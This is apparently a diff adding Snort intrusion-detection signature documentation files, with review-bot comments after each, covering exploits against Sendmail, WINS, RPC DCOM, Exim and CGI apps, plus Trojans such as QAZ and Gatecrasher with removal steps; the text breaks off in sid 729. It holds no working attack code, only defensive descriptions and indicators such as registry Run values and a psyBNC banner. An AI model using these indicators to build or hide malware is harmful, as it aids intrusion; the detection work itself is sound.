+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
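Review bot: The third paragraph of Detailed Information is generic credential-validation boilerplate that does not describe the remote file include vector the Summary and first paragraph document; drop it or rewrite it around the "phpbb_root_path" parameter. The Summary's "an exploitation attempt has been attempted" is redundant, and "ona web server" should be "on a web server". The file opens with two blank lines before "Rule:" unlike the other files, and Affected Systems describes phpNuke as a CGI application.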
--- /dev/null
+++ b/doc/signatures/862.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+862
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
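Review bot: Nothing in this file identifies the CGI script or the vulnerability the rule actually matches; Summary, Detailed Information and Attack Scenarios are all generic boilerplate and Additional References is empty, so an analyst receiving an event for Sid 862 cannot triage it from this text. Name the script and add the vendor advisory or CVE. Typo: "ona web server" should read "on a web server", and the "relationships between the victim server ..." line runs well past the wrapping width used elsewhere.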
--- /dev/null
+++ b/doc/signatures/968.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+968
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions 98
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1
+
+--
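Review bot: Detailed Information says only that "many known vulnerabilities exist" and that "attack scenarios are legion", so the specific FrontPage Server Extensions 98 issue the rule matches is never stated; name the vulnerable component or request. The Microsoft reference wraps the article inside a default.aspx?scid= redirect; the KB number is visible in the path (Q188257), so link the article directly and label it.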
--- /dev/null
+++ b/doc/signatures/2266.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2266
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-12.html
+
+--
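Review bot: Affected Systems ("All systems using Sendmail.") contradicts Detailed Information, which limits the prescan() flaw to Sendmail prior to version 8.12.9; list the affected version range instead. Detailed Information should also say which input prescan() parses so the rule can be related to traffic. Typo in Corrective Action: "verison".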
--- /dev/null
+++ b/doc/signatures/3196.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3196
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft WINS.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft WINS such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker would need to send multiple malformed request to the WINS
+service running on a host.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uninstall the WINS service.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
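Review bot: Additional References is empty for a known Microsoft WINS vulnerability; add the vendor bulletin and CVE link in the format the other files use. Corrective Action's "Uninstall the WINS service." should be qualified (where WINS is not required), since the listed Windows versions may depend on it for name resolution. Grammar and spelling: "multiple malformed request" should be "requests"; "Expoit" should be "Exploit".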
--- /dev/null
+++ b/doc/signatures/100000458.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000458
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "DPVision Tradingeye Shop" application running 
+on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "image" parameter in the "details.cfm" script 
+used by the "DPVision Tradingeye Shop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using DPVision Tradingeye Shop
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
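Review bot: Impact ("system integrity compromise", "execution of arbitrary code") and the second paragraph of Detailed Information ("execute system binaries") are copied from the remote-file-include template and overstate a cross site scripting flaw in the "image" parameter of "details.cfm"; the Attack Scenarios paragraph (a malicious link stealing information from the user who clicks it) is the accurate statement and Impact should match it. Formatting: the "--" separators after the Sid, Affected Systems and Contributors sections are missing the blank line used everywhere else.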
--- /dev/null
+++ b/doc/signatures/256.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+256
+
+--
+Summary:
+This event is generated when an attempt is made to query authors.bind chaos 
+record on a DNS server.  
+
+--
+Impact:
+Information gathering. This activity may indicate reconnaisance before 
+an impending attack.
+
+--
+Detailed Information:
+Bind 9.x allows you get the authors.bind chaos record.  The ability to
+retrieve this file indicates that the machine is running at least a
+9.x variant of the bind nameserver.
+
+--
+Affected Systems:
+	All DNS Servers using Bind
+ 
+--
+Attack Scenarios:
+As part of a reconnaissance mission, an attacker may attempt to glean
+important information about network infrastructure by determining the
+bind version on a nameserver. If authors.bind is retrievable, this
+indicates that Bind 9.x is in use.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Remove the ability to retrieve the authors.bind chaos record by changing 
+the DNS configuration accordingly.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
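Review bot: Corrective Action ("changing the DNS configuration accordingly") does not say which named option removes the authors.bind CHAOS record, so the reader is left to find it; state the option. Detailed Information calls authors.bind a "file" while the Summary and Attack Scenarios call it a record; it is a record in the CHAOS class and should be described consistently. Grammar and spelling: "allows you get" should be "allows you to get"; "reconnaisance" in Impact should be "reconnaissance".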
--- /dev/null
+++ b/doc/signatures/2664.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2664
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against an IMAP server.
+
+--
+Impact:
+Serious. A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the IMAP daemon.
+
+--
+Detailed Information:
+Some versions of the Courier IMAP daemon are vulnerable to format string
+exploits prior to and during authentication to the IMAP server.  A
+successful exploit attempt could result in the remote attacker gaining
+unauthorized root access to a vulnerable system.
+
+--
+Affected Systems:
+	Courier IMAP server versions 1.6 though 3.0.2
+
+--
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+This rule may generate an event if the password for a valid user contains 
+the character "%".
+
+--
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+
+--
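Review bot: Additional References is empty although Affected Systems names a specific product and version range (Courier IMAP 1.6 through 3.0.2); add the vendor advisory or CVE. Typos: "1.6 though 3.0.2" should be "through", and "an gain control" should be "and gain control". Formatting: blank lines appear after the "--" separators before Ease of Attack, Corrective Action, Contributors and Additional References, unlike the other files. The False Positives note about passwords containing "%" is useful and should stay.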
--- /dev/null
+++ b/doc/signatures/2172.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2172
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
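Review bot: Detailed Information says the rule fires on "a filename extension commonly used by viruses" but never names the extension, so the False Positives statement ("A legitimate attachment ... may generate this event") cannot be assessed and an analyst cannot tune it; state the extension the rule matches. Attack Scenarios ("This is indicative of a virus infection.") is stronger than Summary and Impact, which say "possible"; keep the wording consistent. Grammar and spelling: "An virus" should be "A virus"; "propogate" should be "propagate".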
--- /dev/null
+++ b/doc/signatures/100000515.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000515
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "CMS Faethon" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "mainpath" parameter in the "header.php" script 
+used by the "CMS Faethon" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using CMS Faethon
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
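Review bot: Same template problem as the other cross site scripting entry above: Impact and the second paragraph of Detailed Information claim arbitrary code execution and "execute system binaries" for a reflected XSS in the "mainpath" parameter of "header.php", which Attack Scenarios itself describes as a malicious link that steals information from the user; align Impact with Attack Scenarios. The "--" separators after Sid, Affected Systems and Contributors lack the blank line used elsewhere.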
--- /dev/null
+++ b/doc/signatures/493.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid: 493
+
+--
+Summary: 
+This event is generated when an attempt is made to access the psyBNC IRC
+"bouncer".
+
+--
+Impact: 
+
+
+--
+Detailed Information:
+The psyBNC IRC bouncer was designed to hold a connection to an IRC server.  As part
+of the connection process, a psyBNC server will respond with
+"Welcome!psyBNC@lam3rz.de".
+
+--
+Affected Systems:
+ All systems using psyBNC.
+
+--
+Attack Scenarios:
+The psyBNC server itself is not necessarily a risk in itself, but this may be a
+violation of corporate policy. Furthermore, psyBNC has found it's way into a large number
+of rootkits, both as an IRC bouncer and as remote control agent for dDOS networks.
+
+--
+Ease of Attack:
+Simple. Any user can install psyBNC.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+A modified psyBNC server will not respond with "Welcome!psyBNC@lam3rz.de" and could
+easily evade this rule.
+
+SSL encryption between client and server is possible.
+
+--
+Corrective Action:
+Check the originating host IP and source port and investigate the possibility of a
+listening psyBNC server and possible system comprimise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+psyBNC:
+http://www.psychoid.lam3rz.de/
+http://www.psychoid.net/
+
+--
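Review bot: The Impact section is empty; the material for it is already in Attack Scenarios (policy violation, and psyBNC shipping in rootkits as a bouncer and DDoS control agent), so Impact should state that. Corrective Action talks about the originating host and a listening psyBNC server, but Detailed Information says the rule matches the "Welcome!psyBNC@lam3rz.de" banner sent by the server, so which side of the flow is the bouncer should be made explicit. Spelling and style: "it's way" should be "its way"; "dDOS" should be "DDoS"; "comprimise" should be "compromise"; "unkown" should be "unknown"; "Sid: 493" on one line differs from the convention of the Sid on its own line.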
--- /dev/null
+++ b/doc/signatures/1670.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1670
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
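Review bot: As with 862.txt, nothing here identifies the request, script or vulnerability that Sid 1670 matches: Summary, Detailed Information and Attack Scenarios are generic, and Additional References is empty. Name the request the rule detects and add a reference, otherwise the entry cannot support triage.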
--- /dev/null
+++ b/doc/signatures/829.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+829
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
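Review bot: This file is identical to 862.txt apart from the Sid, so it inherits the same gap: the CGI script and vulnerability that Sid 829 matches are never named and Additional References is empty. At minimum the Summary should name the script, and "ona web server" should be "on a web server".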
--- /dev/null
+++ b/doc/signatures/2594.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2594
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
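Review bot: Formatting departs from the template: "Additional References" is missing its colon, the "--" before Corrective Action has no blank line above it, and there are extra blank lines after "Rule:" and the Sid. Detailed Information's "verify header syntax in the e-mail message body" reads oddly since headers precede the body; if the intent is the header syntax check applied to header lines received within the message data, say so. The CVE link uses the legacy CAN-2004-0400 name.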
--- /dev/null
+++ b/doc/signatures/147.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+147
+
+--
+Summary:
+Gatecrasher is a Trojan Horse capable of stealing passwords and key 
+logging.
+
+--
+Impact:
+Possible theft of data and passwords.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Gatecrasher
+server to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named system.exe
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Command
+
+Removal of this entry is required.
+
+Delete the file system.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS99
+
+--
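Review bot: The file has no Affected Systems section; the operating system list sits under Detailed Information instead and should be moved into an Affected Systems block like the other entries. The server filename (system.exe) is given under Ease of Attack, where it does not belong; put it in Detailed Information next to the registry change. In Corrective Action, "Command" is listed under "Registry keys added", but it is a value under the Run key shown, not a key, and the Run key path ends with a stray backslash.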
--- /dev/null
+++ b/doc/signatures/3410.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3410
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
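Review bot: "Expoit" in the Ease of Attack line should read "Exploit", and Additional References is empty for a vulnerability that has a vendor bulletin and a CVE entry; add those links so the "appropriate vendor supplied patches" named in Corrective Action can actually be located. The firewall advice "Block access to RPC ports 135, 139 and 445 for both TCP and UDP" is sound as a perimeter measure, but it does nothing against an already compromised host inside the network, so the text should make clear that patching is the primary fix and the filter is defence in depth.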
--- /dev/null
+++ b/doc/signatures/775.txt
@@ -0,0 +1,97 @@
+Rule:
+
+--
+Sid:
+775
+
+--
+Summary:
+QAZ is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry.
+
+The Trojan changes system startup files and registry settings to add the QAZ sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	108	QAZ Worm Client Login access
+	731	Virus - Possible QAZ Worm (Indicates worm activity)
+	775	Virus - Possible QAZ Worm Infection (Indicates worm activity)
+	733	Virus - Possible QAZ Worm Calling Home (Indicates the worm is trying to send mail)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+
+Registry keys added are:
+
+	StartIE=C:\WINDOWS\notepad.exe qazwsx.hsq
+
+This will start the Trojan each time notepad is executed.
+
+Look for the existence of the file note.com. The file notepad.exe may have been replaced with a Trojaned version that is approximately 120 kb in size (the original is 52 kb).
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS501
+http://www.whitehats.com/info/IDS498
+http://www.whitehats.com/info/IDS499
+
+McAfee
+http://vil.nai.com/vil/content/v_98775.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.qaz.a.html
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/qaz.htm
+
+--
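Review bot: the registry key in Corrective Action, "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run", contains a space in "Current Version"; the actual key name is CurrentVersion, and an administrator searching the registry for the path as written will not find it. "exceutable" should be "executable" and "QAZ sever" should be "QAZ server". The Summary, "QAZ is a Trojan Horse.", does not say what sid 775 indicates even though the SID table in the same file gives it as "Possible QAZ Worm Infection"; lift that into the Summary so the event is self-describing.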
--- /dev/null
+++ b/doc/signatures/3174.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3174
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
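Review bot: this file is a word-for-word copy of 3410.txt, down to the "Expoit" typo, so nothing tells a reader what distinguishes sid 3174 from sid 3410; the Detailed Information paragraph should say which request pattern or variant this particular rule matches, otherwise two events with different sids will be triaged as the same thing. Fix the typo and fill in the empty Additional References as well.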
--- /dev/null
+++ b/doc/signatures/729.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+729
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
